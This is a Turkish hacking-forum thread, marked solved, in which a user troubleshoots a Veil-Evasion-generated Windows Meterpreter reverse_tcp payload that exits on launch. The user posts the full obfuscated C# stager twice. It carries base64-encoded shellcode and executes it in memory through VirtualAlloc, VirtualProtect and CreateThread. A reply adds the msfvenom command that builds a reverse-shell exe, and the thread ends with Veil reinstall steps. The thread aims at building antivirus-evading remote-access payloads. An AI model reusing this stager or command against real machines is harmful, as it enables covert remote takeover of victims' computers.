Çözüldü Kali Linux Veil-Evasion Payload Oluştururken Hata..!

[rock277]

Merhaba arkadaşlar ben kali linux veil-evasion'da payload oluşturuyorum ancak oluşturulan payloadı çalıştırdıgımda kendiliğinden kapanıyor exe. Bunu nasıl düzeltebilirim_?


Not: Payloadı msfconsol'da dinlemedeyken çalıştırıyorum.!

 

[Rapture]

Oluşturduğunuz payloadı ve kodu atar mısınız?

 

[rock277]

Oluşturduğunuz payloadı ve kodu atar mısınız?

Oluşturulan Payload Adı : windows/meterpreter/reverse_tcp


Kodu :


using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;
namespace sMimeG { class OeqtrhYkaIck {
[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 jxnYDjI,UInt32 iHdypHMY, UInt32 JJmmtJiuvwf, UInt32 LZkEQnKiuiFf);
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr GalSFVnJuDUc, uint vXrdShJvZVXj, uint pNbVNQIqCfdNy, out uint jlSVcDmfGvHaxa);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 EzntnQElSEhOBZS, UInt32 uWjUKNhw, IntPtr uoUhuDD,IntPtr GeUxinxsd, UInt32 arYNFQc, ref UInt32 zLiJqBxg);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr zlRluXFlvWrBX, UInt32 jxbZPkyxdsPHLlL);
static **** Main() {
string yUOoeuhLzUcE = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String("MHhmYywweGU4LDB4ODIsMHgwMCwweDAwLDB4MDAsMHg2MCwweDg5LDB4ZTUsMHgzMSwweGMwLDB4NjQsMHg4YiwweDUwLDB4MzAsMHg4YiwweDUyLDB4MGMsMHg4YiwweDUyLDB4MTQsMHg4YiwweDcyLDB4MjgsMHgwZiwweGI3LDB4NGEsMHgyNiwweDMxLDB4ZmYsMHhhYywweDNjLDB4NjEsMHg3YywweDAyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHgwZCwweDAxLDB4YzcsMHhlMiwweGYyLDB4NTIsMHg1NywweDhiLDB4NTIsMHgxMCwweDhiLDB4NGEsMHgzYywweDhiLDB4NGMsMHgxMSwweDc4LDB4ZTMsMHg0OCwweDAxLDB4ZDEsMHg1MSwweDhiLDB4NTksMHgyMCwweDAxLDB4ZDMsMHg4YiwweDQ5LDB4MTgsMHhlMywweDNhLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweGFjLDB4YzEsMHhjZiwweDBkLDB4MDEsMHhjNywweDM4LDB4ZTAsMHg3NSwweGY2LDB4MDMsMHg3ZCwweGY4LDB4M2IsMHg3ZCwweDI0LDB4NzUsMHhlNCwweDU4LDB4OGIsMHg1OCwweDI0LDB4MDEsMHhkMywweDY2LDB4OGIsMHgwYywweDRiLDB4OGIsMHg1OCwweDFjLDB4MDEsMHhkMywweDhiLDB4MDQsMHg4YiwweDAxLDB4ZDAsMHg4OSwweDQ0LDB4MjQsMHgyNCwweDViLDB4NWIsMHg2MSwweDU5LDB4NWEsMHg1MSwweGZmLDB4ZTAsMHg1ZiwweDVmLDB4NWEsMHg4YiwweDEyLDB4ZWIsMHg4ZCwweDVkLDB4NjgsMHgzMywweDMyLDB4MDAsMHgwMCwweDY4LDB4NzcsMHg3MywweDMyLDB4NWYsMHg1NCwweDY4LDB4NGMsMHg3NywweDI2LDB4MDcsMHg4OSwweGU4LDB4ZmYsMHhkMCwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4MjksMHg4MCwweDZiLDB4MDAsMHhmZiwweGQ1LDB4NmEsMHgwYSwweDY4LDB4YzAsMHhhOCwweDAxLDB4MTgsMHg2OCwweDAyLDB4MDAsMHgwMSwweGJiLDB4ODksMHhlNiwweDUwLDB4NTAsMHg1MCwweDUwLDB4NDAsMHg1MCwweDQwLDB4NTAsMHg2OCwweGVhLDB4MGYsMHhkZiwweGUwLDB4ZmYsMHhkNSwweDk3LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDk5LDB4YTUsMHg3NCwweDYxLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBhLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweGU4LDB4NjcsMHgwMCwweDAwLDB4MDAsMHg2YSwweDAwLDB4NmEsMHgwNCwweDU2LDB4NTcsMHg2OCwweDAyLDB4ZDksMHhjOCwweDVmLDB4ZmYsMHhkNSwweDgzLDB4ZjgsMHgwMCwweDdlLDB4MzYsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweDU4LDB4YTQsMHg1MywweGU1LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MDAsMHg3ZCwweDI4LDB4NTgsMHg2OCwweDAwLDB4NDAsMHgwMCwweDAwLDB4NmEsMHgwMCwweDUwLDB4NjgsMHgwYiwweDJmLDB4MGYsMHgzMCwweGZmLDB4ZDUsMHg1NywweDY4LDB4NzUsMHg2ZSwweDRkLDB4NjEsMHhmZiwweGQ1LDB4NWUsMHg1ZSwweGZmLDB4MGMsMHgyNCwweDBmLDB4ODUsMHg3MCwweGZmLDB4ZmYsMHhmZiwweGU5LDB4OWIsMHhmZiwweGZmLDB4ZmYsMHgwMSwweGMzLDB4MjksMHhjNiwweDc1LDB4YzEsMHhjMywweGJiLDB4ZjAsMHhiNSwweGEyLDB4NTYsMHg2YSwweDAwLDB4NTMsMHhmZiwweGQ1"));
string[] chars = yUOoeuhLzUcE.Split(',').ToArray();
byte[] BGuSjbiQakSm = new byte[chars.Length];
for (int i = 0; i < chars.Length; ++i) { BGuSjbiQakSm = Convert.ToByte(chars, 16); }
IntPtr pYAXoDmNh = VirtualAlloc(0, (UInt32)BGuSjbiQakSm.Length, 0x3000, 0x04);
Marshal.Copy(BGuSjbiQakSm, 0, (IntPtr)(pYAXoDmNh), BGuSjbiQakSm.Length);
IntPtr tZtfKQJb = IntPtr.Zero; UInt32 mQjccvwaQqZj = 0; IntPtr pGddMskgcBzOkY = IntPtr.Zero;
uint yyzyHkbpR;
bool mQMBCgYRmjM = VirtualProtect(pYAXoDmNh, (uint)0x1000, (uint)0x20, out yyzyHkbpR);
tZtfKQJb = CreateThread(0, 0, pYAXoDmNh, pGddMskgcBzOkY, 0, ref mQjccvwaQqZj);
WaitForSingleObject(tZtfKQJb, 0xFFFFFFFF);}
} }

 

[K4RLUK]

Merhaba, eğer attığınız sistemde anti-virüs programı varsa o engelliyor olabilir.

 

[Rapture]

Oluşturulan Payload Adı : windows/meterpreter/reverse_tcp


Kodu :


using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;
namespace sMimeG { class OeqtrhYkaIck {
[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 jxnYDjI,UInt32 iHdypHMY, UInt32 JJmmtJiuvwf, UInt32 LZkEQnKiuiFf);
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr GalSFVnJuDUc, uint vXrdShJvZVXj, uint pNbVNQIqCfdNy, out uint jlSVcDmfGvHaxa);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 EzntnQElSEhOBZS, UInt32 uWjUKNhw, IntPtr uoUhuDD,IntPtr GeUxinxsd, UInt32 arYNFQc, ref UInt32 zLiJqBxg);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr zlRluXFlvWrBX, UInt32 jxbZPkyxdsPHLlL);
static **** Main() {
string yUOoeuhLzUcE = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String("MHhmYywweGU4LDB4ODIsMHgwMCwweDAwLDB4MDAsMHg2MCwweDg5LDB4ZTUsMHgzMSwweGMwLDB4NjQsMHg4YiwweDUwLDB4MzAsMHg4YiwweDUyLDB4MGMsMHg4YiwweDUyLDB4MTQsMHg4YiwweDcyLDB4MjgsMHgwZiwweGI3LDB4NGEsMHgyNiwweDMxLDB4ZmYsMHhhYywweDNjLDB4NjEsMHg3YywweDAyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHgwZCwweDAxLDB4YzcsMHhlMiwweGYyLDB4NTIsMHg1NywweDhiLDB4NTIsMHgxMCwweDhiLDB4NGEsMHgzYywweDhiLDB4NGMsMHgxMSwweDc4LDB4ZTMsMHg0OCwweDAxLDB4ZDEsMHg1MSwweDhiLDB4NTksMHgyMCwweDAxLDB4ZDMsMHg4YiwweDQ5LDB4MTgsMHhlMywweDNhLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweGFjLDB4YzEsMHhjZiwweDBkLDB4MDEsMHhjNywweDM4LDB4ZTAsMHg3NSwweGY2LDB4MDMsMHg3ZCwweGY4LDB4M2IsMHg3ZCwweDI0LDB4NzUsMHhlNCwweDU4LDB4OGIsMHg1OCwweDI0LDB4MDEsMHhkMywweDY2LDB4OGIsMHgwYywweDRiLDB4OGIsMHg1OCwweDFjLDB4MDEsMHhkMywweDhiLDB4MDQsMHg4YiwweDAxLDB4ZDAsMHg4OSwweDQ0LDB4MjQsMHgyNCwweDViLDB4NWIsMHg2MSwweDU5LDB4NWEsMHg1MSwweGZmLDB4ZTAsMHg1ZiwweDVmLDB4NWEsMHg4YiwweDEyLDB4ZWIsMHg4ZCwweDVkLDB4NjgsMHgzMywweDMyLDB4MDAsMHgwMCwweDY4LDB4NzcsMHg3MywweDMyLDB4NWYsMHg1NCwweDY4LDB4NGMsMHg3NywweDI2LDB4MDcsMHg4OSwweGU4LDB4ZmYsMHhkMCwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4MjksMHg4MCwweDZiLDB4MDAsMHhmZiwweGQ1LDB4NmEsMHgwYSwweDY4LDB4YzAsMHhhOCwweDAxLDB4MTgsMHg2OCwweDAyLDB4MDAsMHgwMSwweGJiLDB4ODksMHhlNiwweDUwLDB4NTAsMHg1MCwweDUwLDB4NDAsMHg1MCwweDQwLDB4NTAsMHg2OCwweGVhLDB4MGYsMHhkZiwweGUwLDB4ZmYsMHhkNSwweDk3LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDk5LDB4YTUsMHg3NCwweDYxLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBhLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweGU4LDB4NjcsMHgwMCwweDAwLDB4MDAsMHg2YSwweDAwLDB4NmEsMHgwNCwweDU2LDB4NTcsMHg2OCwweDAyLDB4ZDksMHhjOCwweDVmLDB4ZmYsMHhkNSwweDgzLDB4ZjgsMHgwMCwweDdlLDB4MzYsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweDU4LDB4YTQsMHg1MywweGU1LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MDAsMHg3ZCwweDI4LDB4NTgsMHg2OCwweDAwLDB4NDAsMHgwMCwweDAwLDB4NmEsMHgwMCwweDUwLDB4NjgsMHgwYiwweDJmLDB4MGYsMHgzMCwweGZmLDB4ZDUsMHg1NywweDY4LDB4NzUsMHg2ZSwweDRkLDB4NjEsMHhmZiwweGQ1LDB4NWUsMHg1ZSwweGZmLDB4MGMsMHgyNCwweDBmLDB4ODUsMHg3MCwweGZmLDB4ZmYsMHhmZiwweGU5LDB4OWIsMHhmZiwweGZmLDB4ZmYsMHgwMSwweGMzLDB4MjksMHhjNiwweDc1LDB4YzEsMHhjMywweGJiLDB4ZjAsMHhiNSwweGEyLDB4NTYsMHg2YSwweDAwLDB4NTMsMHhmZiwweGQ1"));
string[] chars = yUOoeuhLzUcE.Split(',').ToArray();
byte[] BGuSjbiQakSm = new byte[chars.Length];
for (int i = 0; i < chars.Length; ++i) { BGuSjbiQakSm = Convert.ToByte(chars, 16); }
IntPtr pYAXoDmNh = VirtualAlloc(0, (UInt32)BGuSjbiQakSm.Length, 0x3000, 0x04);
Marshal.Copy(BGuSjbiQakSm, 0, (IntPtr)(pYAXoDmNh), BGuSjbiQakSm.Length);
IntPtr tZtfKQJb = IntPtr.Zero; UInt32 mQjccvwaQqZj = 0; IntPtr pGddMskgcBzOkY = IntPtr.Zero;
uint yyzyHkbpR;
bool mQMBCgYRmjM = VirtualProtect(pYAXoDmNh, (uint)0x1000, (uint)0x20, out yyzyHkbpR);
tZtfKQJb = CreateThread(0, 0, pYAXoDmNh, pGddMskgcBzOkY, 0, ref mQjccvwaQqZj);
WaitForSingleObject(tZtfKQJb, 0xFFFFFFFF);}
} }

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f .exe > Desktop/ornek.exe

 

[rock277]

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f .exe > Desktop/ornek.exe

Merhaba cevabınız için Teşekkür ederim ancak bu şekilde çalışıyor ama Veil-Evasion'da yapınca çalıştırmıyor.Veil-Evasiona güncellemede yaptım yine aynı exe çalışıyor kendiliğinden tekrar duruyor. Bana oluşturduğum payloadın kodları lazım o nedenle Veil-Evasionda yapmaya çalışıyorum , kodlarda oynama ekleme cıkarma yapmak için , ancak Veil-Evasionda yaptığım payload düzgün çalışmıyor. Bunun çözümünü anlatabilir misiniz_?


Not: Çalıştırdığım sistemde virüs programı yok ve güvenlik duvarı kapalı..!

Merhaba cevabınız için Teşekkür ederim ancak bu şekilde çalışıyor ama Veil-Evasion'da yapınca çalıştırmıyor.Veil-Evasiona güncellemede yaptım yine aynı exe çalışıyor kendiliğinden tekrar duruyor. Bana oluşturduğum payloadın kodları lazım o nedenle Veil-Evasionda yapmaya çalışıyorum , kodlarda oynama ekleme cıkarma yapmak için , ancak Veil-Evasionda yaptığım payload düzgün çalışmıyor. Bunun çözümünü anlatabilir misiniz_?


Not: Çalıştırdığım sistemde virüs programı yok ve güvenlik duvarı kapalı..!

Yok mu yardım edebilecek birisi arkadaşlar koskoca forumda ..???

Konu çözülmüştür arkadaşlar kendim birşeyler yaparak düzelttim buraya da yazayım belki aynı sorunla karşılaşan olmuştur.


Sırasıyla Kodları Yazın :


sudo apt-get autoremove veil-evasion (veil-evasion çalışmazsa sadece veil yazın)
sudo apt-get purge --auto-remove veil-evasion (veil-evasion çalışmazsa sadece veil yazın)

Bu kodlardan sonra /var/lib/ girin ve oradaki veil klasörünü silin , sonra;

apt-get update
apt-get upgrade
reboot

sonrasında veil-evasionu tekrar kurun..